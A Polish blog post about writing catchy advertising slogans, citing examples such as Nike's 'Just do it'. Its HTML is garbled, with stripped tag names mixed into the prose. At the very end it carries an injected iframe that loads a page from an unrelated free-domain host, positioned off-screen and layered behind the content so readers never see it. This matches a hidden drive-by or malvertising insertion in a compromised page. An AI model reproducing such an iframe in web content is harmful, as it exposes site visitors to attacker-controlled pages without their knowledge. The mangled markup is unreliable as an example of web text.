Reklama (nie tylko odzieżowa)

Chwyty reklamowe – czyli co?

25 marca 2016 • Opublikowane przez

Czym są chwyty marketingowe? To sposoby producentów na przybliżenie klientowi produktu z jak najlepszej strony. Sprzedaż zależy od wielu czynników. Istotna jest kwestia wizualna produktu oraz osoby sprzedającej, warstwa brzmieniowa oraz to, czy zakup będzie wydawał się atrakcyjny. Przedstawiamy dziś 5 reguł, które zwięk­szą praw­dopodobieństwo suk­cesu w stwo­rze­niu chwytliwego hasła reklamowego, dzięki któremu sprzedaż wzrośnie.

!–more–

nbsp;

Hasło reklamowe musi być wyjątkowe. Specjaliści od marketingu wiedzą, jak stworzyć idealny slogan. Oto zasady, którymi kierują się podczas układania ich.

nbsp;

strongIdentyfikacja/strong

Udany slo­gan powi­nien być spójny z nazwą. Ma stanowićstrong kon­tynu­ację lub uzu­peł­ni­enie komu­nikatu/strong w niej zawartego. Przykładem takiego zagrania może być umieszczenie w haśle nowej nazwy firmy czy produktu (np. Cilit Bang – Bang i po brudzie!). Jednak to nie jedyna możliwość. Najważniejsze jest to, aby slo­gan był kompatybilny z nazwą, jej dopełnie­niem i odbiciem.
div

span style=”color: #333333;”span style=”font-family: Georgia, ‚Times New Roman’, ‚Bitstream Charter’, Times, serif;”span style=”font-size: medium;”span style=”color: #ffffff;”R/span/span/span/span

/div
div/div
div/div
strongZapamiętywalność/strong

Ten termin pasuje idealnie do tematu strongfirm, marek handlowych i reklam/strong. Mnóstwo powstających dziś sloganów znamy doskonale dzięki nazwom marek, którym towa­rzyszą. Takim hasłem posłużyła się m.in. firma Nike — a href=”http://argos.pl/oferta,23.html”producent kurtek/a, butów sportowych, a także innych elementów garderoby, związanych z strongaktywnością fizyczną/strong. Slogan „Just do it” zapamiętały tysiące ludzi na całym świecie. Ważna jest tu zwięzłość hasła, ale nie celowe skracanie go. Czasami okazuje się, że dłuższe hasło będzie bardziej przekonujące, a dzięki temu okaże się skuteczniejsze.

nbsp;

strongPłynące korzyści/strong

Dla klienta najważniejsze jest to, co uzyska poprzez strongzakup nowego produktu/strong lub usługi. Pozostałe działania nie są dla niego istotne. Dlatego też dobry slogan powinien skupiać się na potencjalnym kliencie i uzmysłowić mu, ile zyska dzięki skorzystaniu z propozycji producenta.

a href=”http://argos.pl/blog/wp-content/uploads/2016/03/shopping.png”img class=”size-full wp-image-2701″ src=”http://argos.pl/blog/wp-content/uploads/2016/03/shopping.png” alt=”twoje-wiesci.pl” width=”650″ height=”407″ //a twoje-wiesci.pl

nbsp;
p class=”before2 ml73″strongCecha wyróżniająca/strong/p
p class=”before2 ml73″Rynek wypełniony jest ofertami produktów, z któregostrong każdy chce zostać sprzedany/strong. Bycie dobrym, a nawet i najlepszym może nie wystarczyć. Oprócz wartych zaznaczenia zalet reklama powinna mówić też o cechach, które odróżniają produkt od kon­ku­ren­cji. Co naprawdę jest jego wyjąt­kową prze­wagą? Dobrze, aby istniała choć jedna cecha, wyróżniająca go w ten sposób./p
p class=”before2 ml73″strongProstota/strong/p
p class=”before2 ml73″Slogan powinien się nią cechować. W tych kilku słowach powinno zawrzeć się całastrong siła przekazu/strong. Niewiele, a bardzo wiele zarazem. Dobrze więc będzie używać jedynie powszech­nie zna­nych wyrazów i zwrotów. Nie mniej, nie więcej, a tyle, ile trzeba./p
p class=”before2 ml73″Reklama i marketing idą w parze. Chwyty reklamowe od lat działają na konsumentów. Aby dobrze sprzedać produkt, warto nie tylko je znać, ale i umieć zastosować. To naprawdę działa!!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe